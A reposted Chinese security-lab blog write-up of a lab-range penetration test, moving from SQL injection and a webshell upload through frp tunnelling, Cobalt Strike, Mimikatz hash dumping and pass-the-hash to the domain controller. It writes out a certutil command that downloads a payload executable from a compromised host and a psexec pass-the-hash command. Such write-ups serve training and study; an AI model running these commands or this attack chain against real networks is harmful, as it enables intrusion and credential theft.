记一次靶场渗透测试到拿下域控的实战演练

admin 2022年3月29日23:03:59安全文章评论24 views1507字阅读5分1秒阅读模式

记一次靶场渗透测试到拿下域控的实战演练

破军安全实验室


    忆享科技旗下高端的网络安全攻防服务团队.安服内容包括渗透测试、代码审计、应急响应、漏洞研究、威胁情报、安全运维、攻防演练等

本文约1500字,阅读约需5分钟。



 0x00 环境准备




网络拓扑图如下


记一次靶场渗透测试到拿下域控的实战演练


外网Web

172.16.10.*/192.168.140.140(Linux)

内网Web

192.168.140.142192.168.140.141192.168.140.143/192.168.142.113

DC

10.10.10.10

user

192.168.142.112


0x01 打点




工具指南

dismap下载地址:

https://github.com/zhzyker/dismap


记一次靶场渗透测试到拿下域控的实战演练

 

确定ip地址172.16.30.17是目标靶场


记一次靶场渗透测试到拿下域控的实战演练

 

开始爆破目录


记一次靶场渗透测试到拿下域控的实战演练

 

已爆破目录

robots.txtindex.html


记一次靶场渗透测试到拿下域控的实战演练

 

/m3diNf0/se3reTdir777/uploads

访问了/se3reTdir777/uploads但是是禁止访问的


记一次靶场渗透测试到拿下域控的实战演练


于是访问了上一级目录


记一次靶场渗透测试到拿下域控的实战演练

 

在输入处尝试sql注入


记一次靶场渗透测试到拿下域控的实战演练

 

现在我们想执行os-shell还要知道网站的绝对路径,我们可以对/m3diNf0目录再次进行爆破


记一次靶场渗透测试到拿下域控的实战演练

 

SCRIPT_FILENAME处找到网站的绝对路径


记一次靶场渗透测试到拿下域控的实战演练

 

sqlmap填路径的时候一定要用

/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

因为其他路径没有权限


记一次靶场渗透测试到拿下域控的实战演练

 

sqlmap上传功能的界面上传一个新的木马

 

记一次靶场渗透测试到拿下域控的实战演练


上传冰蝎马


记一次靶场渗透测试到拿下域控的实战演练



0x02 代理&& CS




Cross C2上线Linux主机


记一次靶场渗透测试到拿下域控的实战演练

 

记一次靶场渗透测试到拿下域控的实战演练


frp代理打通sosks5的隧道后用proxifier挂代理


记一次靶场渗透测试到拿下域控的实战演练

 

访问192.168.140.141,确认挂上代理


记一次靶场渗透测试到拿下域控的实战演练

 

因为phpstudy代码执行在header里,所以我们直接用蚁剑去链接,配置如下


记一次靶场渗透测试到拿下域控的实战演练

 

192.168.140.141上线goproxy端口转发出来


记一次靶场渗透测试到拿下域控的实战演练

 

CobaltStrike设置


记一次靶场渗透测试到拿下域控的实战演练

 

把生成的木马上传到192.168.140.141上执行


记一次靶场渗透测试到拿下域控的实战演练

 

CobaltStrike成功上线


记一次靶场渗透测试到拿下域控的实战演练

 

到这一步我们该横向了,因为DC192.168.140.143,Mimikatz读到了NTLM


记一次靶场渗透测试到拿下域控的实战演练

 

0x03 PTH哈希传递




PsexecNTLM传递


记一次靶场渗透测试到拿下域控的实战演练

 

因为192.168.140.143可以连接192.168.140.140,所以可以直接执行木马


记一次靶场渗透测试到拿下域控的实战演练

 

certutil命令下载

certutil.exe -urlcache -split -f http://192.168.140.140/se3reTdir777/uploads/hm2.exehm2.exe

 

记一次靶场渗透测试到拿下域控的实战演练

 

192.168.140.140设置成frps


记一次靶场渗透测试到拿下域控的实战演练

 

CobaltStrike执行frpc


记一次靶场渗透测试到拿下域控的实战演练

 

由于ms17-010有些问题,我们直接用了PTH


记一次靶场渗透测试到拿下域控的实战演练

 

SMB Beacon上线192.168.142.112SMB Beacon生成,生成木马必须用windows Executable(s)


记一次靶场渗透测试到拿下域控的实战演练

 

Psexec [email protected] -hashsxxxxxxxxxxxxxxxxxxxxxxxx -c beacon


记一次靶场渗透测试到拿下域控的实战演练




 声明

    由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,破军安全实验室及文章作者不为此承担任何责任。

    破军安全实验室拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经破军安全实验室允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。


记一次靶场渗透测试到拿下域控的实战演练

破军安全实验室

# 长按二维码 关注我们 #



原文始发于微信公众号(破军安全实验室):记一次靶场渗透测试到拿下域控的实战演练

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月29日23:03:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  记一次靶场渗透测试到拿下域控的实战演练 https://cn-sec.com/archives/852731.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: